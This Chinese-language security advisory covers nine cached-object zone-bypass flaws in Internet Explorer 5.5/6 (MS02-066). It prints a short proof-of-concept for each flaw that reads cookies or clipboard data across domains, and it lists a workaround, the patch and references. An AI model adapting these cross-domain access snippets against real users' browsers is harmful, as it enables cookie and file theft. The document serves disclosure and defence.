Microsoft Internet Explorer多个缓存对象区域绕过漏洞

漏洞信息详情

Microsoft Internet Explorer多个缓存对象区域绕过漏洞

漏洞简介

Microsoft Internet Explorer是微软开发和维护的WEB浏览器。
Internet Explorer在处理缓存对象(cached objects)时存在问题,远程攻击者可以利用这个漏洞执行其他域和安全区域中的脚本代码,造成信息泄露等问题。
当窗口之间通信的时候,MSIE安全机制必须确保页面在同一安全区域和同一域中,而缓存对象处理中MSIE安全机制对访问控制检查不充分。当攻击者在自己站点页面中打开窗口时IE会缓存主窗口到子窗口的引用(类似C的指针),虽然这时候子窗口内访问的URL可能已经改变了,但主窗口通过调用引用还是能够被控制,这样就可能使的直接访问不同域和不同安全区域中的内容。攻击者可以通过构建恶意WEB页面,并诱使用户点击,窃取目标用户COOKIE信息,泄露目标用户本地系统文件。
下面9个漏洞都是相关于对象缓存问题,但是每个漏洞都是独立的漏洞,使用独立的方法进行利用。下面所描述的包含3个部分,\”Cache\”显示怎样缓存有问题的对象,\”Exploit\”显示漏洞怎样工作,\”Impact\”描述漏洞的危害。
\”Full access\”表示可以访问任意域和任意安全区域中的任意页面文档对象模型(DOM)。
1. showModalDialog
Cache: var fVuln=oWin.showModalDialog;
Exploit – IE 5.5:
fVuln(\”javascript:alert(dialogArguments.document.cookie)\”,oWin,\”\”);
Exploit – IE 6: 利用难度比较大,可使用\”analyze.dlg\”
vulnerability.
Impact: 在IE5.5中完全访问, IE6中\”My Computer\”安全区域可访问。
2. external
Cache: var oVuln=oWin.external;
Exploit: oVuln.NavigateAndFind(\”javascript:alert(document.cookie)\”,\”\”,\”\”);
Impact: Full access.
3. createRange
Cache: var fVuln=oWin.document.selection.createRange;
Exploit: fVuln().pasteHTML(\”<img
src=\\”javascript:alert(document.cookie)\\”>\”);
Impact: Full access.
4. elementFromPoint
Cache: var fVuln=oWin.document.elementFromPoint;
Exploit: alert(fVuln(1,1).document.cookie);
Impact: Full access.
5. getElementById
Cache: var fVuln=oWin.document.getElementById;
Exploit: alert(fVuln(\”ElementIdInNewDoc\”).document.cookie);
Impact: Full access.
6. getElementsByName
Cache: var fVuln=oWin.document.getElementsByName;
Exploit: alert(fVuln(\”ElementNameInNewDoc\”)[0].document.cookie);
Impact: Full access.
7. getElementsByTagName
Cache: var fVuln=oWin.document.getElementsByTagName;
Exploit: alert(fVuln(\”BODY\”)[0].document.cookie);
Impact: Full access.
8. execCommand
Cache: var fVuln=oWin.document.execCommand;
Exploit: fVuln(\”SelectAll\”); fVuln(\”Copy\”);
alert(clipboardData.getData(\”text\”));
Impact: 读区访问装载的文档
9. clipboardData
Cache: var oVuln=oWin.clipboardData;
Exploit: alert(oVuln.getData(\”text\”)); or oVuln.setData(\”text\”,\”data\”);
Impact: 无需考虑设置,读/写访问剪贴板

漏洞公告

临时解决方法:
如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:

* 暂时关闭浏览器的Active Scripting执行。
厂商补丁:
Microsoft
———
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

Microsoft Patch ie6sp1

http://www.microsoft.com/windows/ie/downloads/critical/ie6sp1/default.asp” target=”_blank”>
http://www.microsoft.com/windows/ie/downloads/critical/ie6sp1/default.asp

参考网址

来源: BID
名称: 6028
链接:http://www.securityfocus.com/bid/6028

来源: MS
名称: MS02-066
链接:http://www.microsoft.com/technet/security/bulletin/ms02-066.asp

来源: XF
名称: ie-cache-showmodaldialog-dom-access(10432)
链接:http://xforce.iss.net/xforce/xfdb/10432

来源: XF
名称: ie-cache-execcommand-dom-access(10439)
链接:http://www.iss.net/security_center/static/10439.php

来源: XF
名称: ie-cache-getelementsbytagname-dom-access(10438)
链接:http://www.iss.net/security_center/static/10438.php

来源: XF
名称: ie-cache-getelementsbyname-dom-access(10437)
链接:http://www.iss.net/security_center/static/10437.php

来源: XF
名称: ie-cache-getelementbyid-dom-access(10436)
链接:http://www.iss.net/security_center/static/10436.php

来源: XF
名称: ie-cache-elementfrompoint-dom-access(10435)
链接:http://www.iss.net/security_center/static/10435.php

来源: CIAC
名称: N-018
链接:http://www.ciac.org/ciac/bulletins/n-018.shtml

来源: security.greymagic.com
链接:http://security.greymagic.com/adv/gm012-ie/

来源: BUGTRAQ
名称: 20021022 Vulnerable cached objects in IE (9 advisories in 1)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103530131201191&w=2

来源: US Government Resource: oval:org.mitre.oval:def:408
名称: oval:org.mitre.oval:def:408
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:408

来源: US Government Resource: oval:org.mitre.oval:def:388
名称: oval:org.mitre.oval:def:388
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:388

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享